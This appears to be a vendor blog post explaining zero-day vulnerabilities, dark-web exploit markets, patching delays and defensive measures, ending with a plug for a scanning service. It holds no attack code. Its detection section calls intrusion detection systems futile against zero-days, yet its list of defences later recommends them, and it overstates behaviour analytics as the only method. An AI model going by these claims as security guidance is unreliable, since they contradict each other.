What is a Zero-day vulnerability?
A zero-day vulnerability is essentially a defect in the digital security infrastructure which can be exploited by cyber-criminals, governments and nefarious third parties. This defect has not been patched by the security vendor and can be caused by improper computer or security programming and configuration. When a zero-day vulnerability is made public information, it is called an n-day or one-day vulnerability.
Threat of vulnerabilities
Cybercriminals use code to target security vulnerabilities; they bundle this code into malware termed a zero-day exploit. This ominous software uses the weakness to compromise a computer systems, hardware and network. A patch from the software developer can usually fix this. The concern then is, ‘What if the software developer never notices the security vulnerability?’.
This harmful malware compromises your data, give hackers access to your computer, allow the installation of other malware, corrupt files and steal confidential information. These vulnerabilities can come through a variety of mediums such as web browsing, email attachments and infected media.
A zero-day attack is considered to have occurred when a security vulnerability is exploited before software developers have the chance to secure it with a patch. These vulnerabilities are often discovered months or years after their exposure.
Impact of Dark Web
The dark web is a market for all cyber crime tools, including zero-day vulnerabilities. This market does not discriminate in its sales; it sells to approved governments but also to organized crime units, cyber criminals, third party hackers and nefarious countries such as North Korea and Iran. The dark market is void of restrictions, unlike the grey market which restricts sales to countries such as North Korea.
Delayed patching may be worse than zero-days
Zero days can be damaging for companies but can easily be prevented as well. Often, security patches are released by a software vendor but the affected devices, especially IoT devices never are never patched up. As a result, exposed security vulnerabilities are more valuable to attackers than actual zero day attacks; the reason being that an overt zero day attack brings vulnerabilities to the light forcing the victim organization to respond.
A covert attack instead, is malicious because of its anonymity and ability to stay undetected. Governments agencies such as NSA, CIA and FBI often use zero day attacks as opportunities to catch cyber criminals red handed instead of reporting the security vulnerabilities to the target vendors. Enemy states often use these tools carefully to conduct covert cyber warfare attacks.
Detection of zero-day vulnerabilities
Zero-day vulnerabilities are challenging to identify. Since no attack signature is present, the use of anti malware software, intrusion detection and intrusion prevention systems are futile. The only way to detect zero-day vulnerabilities is by using behavior analytics to identify abnormal patterns of usage across networks.
How can you protect yourself?
Zero-day vulnerabilities may be difficult to detect but they’re not impossible to protect against. There are several ways of defending yourself:
1. Employ the use of local area networks (LAN) to insulate sensitive traffic moving between servers.
2. Use IPsec, the IP security protocol which encrypts and authenticates packets of data sent over a network.
3. Use intrusion detection systems and intrusion prevention systems which may warn firms target firms of suspicious user activity which could be the sign of an incoming zero-day attack.
4. Update all systems and devices with the latest software patches and security updates, use firewalls and follow security policies designated by the company.
5. Use public vulnerability disclosures which essentially report security issues to the public.
6. Encourage bug bounties which provide financial incentives to ethical security hackers or them to provide insights on security vulnerabilities of an organization. These financial incentives are a much lower cost to firms than a zero-day attack.
7. Utilize vulnerability scanning services from providers such as Cyber Chasse to identify any security vulnerabilities in the firm’s network or systems.